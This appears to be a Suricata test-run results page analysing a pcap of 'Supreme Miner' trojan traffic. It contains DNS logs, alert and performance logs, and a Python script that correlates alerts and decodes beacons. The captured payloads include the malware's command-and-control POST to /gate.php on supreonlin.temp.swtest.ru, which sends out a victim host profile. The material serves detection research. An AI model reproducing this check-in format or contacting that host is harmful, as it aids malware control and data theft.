{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"e.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"m.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:50:08.077884+0000","flow_id":1653257758847036,"pcap_cnt":13,"event_type":"dns","src_ip":"192.168.95.10","src_port":56588,"dest_ip":"10.55.99.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60423,"rrname":"bitbucket.org","rrtype":"A","tx_id":0}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"bitbucket.org","rrtype":"A","ttl":52,"rdata":"104.192.143.3"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"bitbucket.org","rrtype":"A","ttl":52,"rdata":"104.192.143.1"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"bitbucket.org","rrtype":"A","ttl":52,"rdata":"104.192.143.2"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"b2.org.afilias-nst.org"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"c0.org.afilias-nst.info"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"d0.org.afilias-nst.org"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"b0.org.afilias-nst.org"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"a2.org.afilias-nst.info"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"a0.org.afilias-nst.info"}}
{"timestamp":"2018-07-02T11:50:08.781835+0000","flow_id":1556605962335948,"pcap_cnt":23,"event_type":"tls","src_ip":"192.168.95.10","src_port":49159,"dest_ip":"104.192.143.3","dest_port":443,"proto":"TCP","tls":{"subject":"unknown=Private Organization, unknown=US, unknown=Delaware, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., OU=Bitbucket, CN=bitbucket.org","issuerdn":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA"}}
{"timestamp":"2018-07-02T11:50:21.734482+0000","flow_id":1461133135131922,"pcap_cnt":390,"event_type":"dns","src_ip":"192.168.95.10","src_port":57909,"dest_ip":"10.55.99.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26940,"rrname":"supreonlin.temp.swtest.ru","rrtype":"A","tx_id":0}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"supreonlin.temp.swtest.ru","rrtype":"A","ttl":599,"rdata":"77.222.40.43"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"ru","rrtype":"NS","ttl":26359,"rdata":"a.dns.ripn.net"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"ru","rrtype":"NS","ttl":26359,"rdata":"d.dns.ripn.net"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"ru","rrtype":"NS","ttl":26359,"rdata":"e.dns.ripn.net"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"ru","rrtype":"NS","ttl":26359,"rdata":"f.dns.ripn.net"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"ru","rrtype":"NS","ttl":26359,"rdata":"b.dns.ripn.net"}}
{"timestamp":"2018-07-02T11:50:22.444555+0000","flow_id":512976154970251,"pcap_cnt":399,"event_type":"dn

This file has been truncated.


unified2.alert.1530803408 - (3126 bytes) - download
[unified2 is a binary alert format; the page renders the file as raw bytes. Only the captured packet payloads are readable. They contain one long HTTP form body and thirteen copies of a short one, which line up with the single M2 alert and the thirteen M3 alerts in the fast.log below.]

Initial check-in body (sent once):
id=FC05C743&ip=C%3a%5cProgramData%5c%7b5b6b56-24c1bb-55e1-72f2382933a9%7d%5chostdl.exe&os=Windows+7&av=FC05C743&cn=PC-4A095E27CB&cpu=Intel(R)+Core(TM)2+Duo+CPU+++++T7700++%40+2.40GHz&gpu=Standard+VGA+Graphics+Adapter&pv=Admin&bv=v1.1.0&enabled=0

Repeated check-in request (headers and body are captured in separate packets because of Expect: 100-continue; the body is exactly the 31 bytes declared in Content-Length):
POST /gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: supreonlin.temp.swtest.ru
Content-Length: 31
Expect: 100-continue

id=FC05C743&enabled=1&bv=v1.1.0


suricata-4.0.0-test-test-perf.txt-2018-07-05-T-15-10-10-07052018.1510-merged.pcap.txt - (725 bytes) - download
  --------------------------------------------------------------------------
  Date: 7/5/2018 -- 15:10:10. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        1003547      1        1        119679       11.86  1        1        119679      119679.00   119679.00   0.00       
  2        1003548      1        1        889835       88.14  14       13       104595      63559.64    65882.92    33357.00   


keyword_perf.log - (4369 bytes) - download
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 7/5/2018 -- 15:10:10
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             51176           15              15              4653            3411.00         3411.00         0.00           
  content          313040          90              89              8643            3478.00         3487.00         2670.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             51176           15              15              4653            3411.00         3411.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          45994           14              14              3990            3285.00         3285.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          172965          48              47              8643            3603.00         3623.00         2670.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          51022           14              14              4876            3644.00         3644.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          43059           14              14              3768            3075.00         3075.00         0.00           


IDSDeathBlossom.py.log - (1242 bytes) - download
2018-07-05 15:10:07,082 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2018-07-05 15:10:08,296 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2018-07-05 15:10:08,296 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-test-test
2018-07-05 15:10:08,304 - INFO - generate_config - /opt/IDSDeathBlossom/IDSDeathBlossom.py +162 - Loading glob result: ['/tmp/tmpnRSXzF']
2018-07-05 15:10:08,304 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2018-07-05 15:10:08,304 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2018-07-05 15:10:08,305 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /tmp/IXUyPT -l /var/www/html/1c95dcebfd89d44f61031e49a8818557140b85e9e9124dd03a3071940a2c06d1 -r /var/pcap/07052018.1510-merged.pcap -vvv -k none
2018-07-05 15:10:10,030 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2018-07-05 15:10:10,031 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 2.96215701103


suricata-4.0.0-test-test-alert-2018-07-05-T-15-10-10-07052018.1510-merged.pcap.txt - (2884 bytes) - download
07/02/2018-11:50:22.767122  [**] [1:1003547:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:23.379276  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:28.776890  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:34.174501  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:39.587682  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:44.985265  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:50.385431  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:55.780421  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:01.178091  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:06.887601  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:12.488035  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:18.478476  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:24.687260  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-12:21:00.545488  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
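A worked example, added here and not part of the page's tooling (neither IDSDeathBlossom nor Suricata ships it), that ties the logs above together: it builds a passive-DNS map from the eve.json DNS answers, parses the fast.log alerts, attaches the name that resolved to each alert's destination IP (77.222.40.43 is the answer for supreonlin.temp.swtest.ru at 11:50:21), decodes the check-in bodies recovered from the unified2 payload, and measures the cadence of the M3 alerts. The samples embedded in the block are copied from the excerpts on this page (the eve.json records trimmed to the fields used). The fast.log regex, the 20% tolerance band and the 80% regularity threshold are my own choices, not anything taken from Suricata or from the ETPRO rules.

```python
"""Tie the page's Suricata output together: passive DNS from eve.json, fast.log
parsing, alert-to-domain correlation, check-in decoding and beacon cadence.
Added example for this page; not code from Suricata or IDSDeathBlossom."""
import json
import re
from collections import defaultdict
from datetime import datetime
from statistics import median
from urllib.parse import parse_qs

# Constructed sample: DNS answers copied from the page's eve.json, trimmed to the fields used.
EVE_JSON = """\
{"timestamp":"2018-07-02T11:50:08.113264+0000","event_type":"dns","src_ip":"10.55.99.1","dest_ip":"192.168.95.10","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"bitbucket.org","rrtype":"A","ttl":52,"rdata":"104.192.143.3"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","event_type":"dns","src_ip":"10.55.99.1","dest_ip":"192.168.95.10","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"b2.org.afilias-nst.org"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","event_type":"dns","src_ip":"10.55.99.1","dest_ip":"192.168.95.10","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"supreonlin.temp.swtest.ru","rrtype":"A","ttl":599,"rdata":"77.222.40.43"}}
"""

# Constructed sample: the fast.log alerts from the page (one M2 alert, then thirteen M3 alerts).
FAST_LOG = """\
07/02/2018-11:50:22.767122  [**] [1:1003547:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:23.379276  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:28.776890  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:34.174501  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:39.587682  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:44.985265  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:50.385431  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:55.780421  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:01.178091  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:06.887601  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:12.488035  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:18.478476  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:24.687260  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-12:21:00.545488  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
"""

# Check-in bodies as they appear in the unified2 packet payloads on the page.
FIRST_CHECKIN = (
    "id=FC05C743&ip=C%3a%5cProgramData%5c%7b5b6b56-24c1bb-55e1-72f2382933a9%7d%5chostdl.exe"
    "&os=Windows+7&av=FC05C743&cn=PC-4A095E27CB&cpu=Intel(R)+Core(TM)2+Duo+CPU+++++T7700++%40+2.40GHz"
    "&gpu=Standard+VGA+Graphics+Adapter&pv=Admin&bv=v1.1.0&enabled=0"
)
BEACON_CHECKIN = "id=FC05C743&enabled=1&bv=v1.1.0"

# fast.log line layout: my own regex, written against the lines above (not a Suricata API).
FAST_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r".*\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)


def passive_dns(eve_text):
    """Map answered IPs back to the names that resolved to them (A/AAAA answers only)."""
    ip_to_names = defaultdict(set)
    for line in filter(str.strip, eve_text.splitlines()):
        ev = json.loads(line)
        dns = ev.get("dns", {})
        if ev.get("event_type") == "dns" and dns.get("type") == "answer" and dns.get("rrtype") in ("A", "AAAA"):
            ip_to_names[dns["rdata"]].add(dns["rrname"])
    return dict(ip_to_names)


def parse_fast_log(text):
    """Parse fast.log lines into dicts; non-matching lines are skipped."""
    alerts = []
    for m in filter(None, map(FAST_RE.match, text.splitlines())):
        a = m.groupdict()
        a["time"] = datetime.strptime(a["ts"], "%m/%d/%Y-%H:%M:%S.%f")
        a["sid"] = int(a["sid"])
        alerts.append(a)
    return alerts


def correlate(alerts, ip_to_names):
    """(sid, destination IP, names that resolved to it) for every alert."""
    return [(a["sid"], a["dst"], sorted(ip_to_names.get(a["dst"], ()))) for a in alerts]


def beacon_stats(alerts, sid, band=0.2, min_fraction=0.8):
    """Gaps between consecutive alerts for one sid. The cadence is judged against the
    median gap so a single long hole (the 30 minute gap before the page's last alert)
    does not mask an otherwise regular beacon, as a mean/stdev test would."""
    times = sorted(a["time"] for a in alerts if a["sid"] == sid)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if not gaps:
        return {"count": len(times), "gaps": [], "median": None, "in_band": 0, "regular": False}
    med = median(gaps)
    in_band = sum(1 for g in gaps if abs(g - med) <= band * med)
    return {"count": len(times), "gaps": gaps, "median": med, "in_band": in_band,
            "regular": in_band / len(gaps) >= min_fraction}


def parse_checkin(body):
    """Decode an application/x-www-form-urlencoded check-in body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


if __name__ == "__main__":
    alerts = parse_fast_log(FAST_LOG)
    print(correlate(alerts, passive_dns(EVE_JSON))[0])   # (1003547, '77.222.40.43', ['supreonlin.temp.swtest.ru'])
    print(beacon_stats(alerts, 1003548))                  # median gap about 5.4 s, 11 of 12 gaps in band
    print(parse_checkin(FIRST_CHECKIN)["ip"], parse_checkin(BEACON_CHECKIN))
```

To run this against real output, replace the embedded strings with the contents of eve.json and fast.log. The first check-in decodes to a host profile (drop path under C:\ProgramData, OS, hostname, CPU and GPU model, privilege level, bot version) while the repeated body carries only the bot id, an enabled flag and the version, which is why the M3 alerts recur every 5.4 s and the M2 alert fires once.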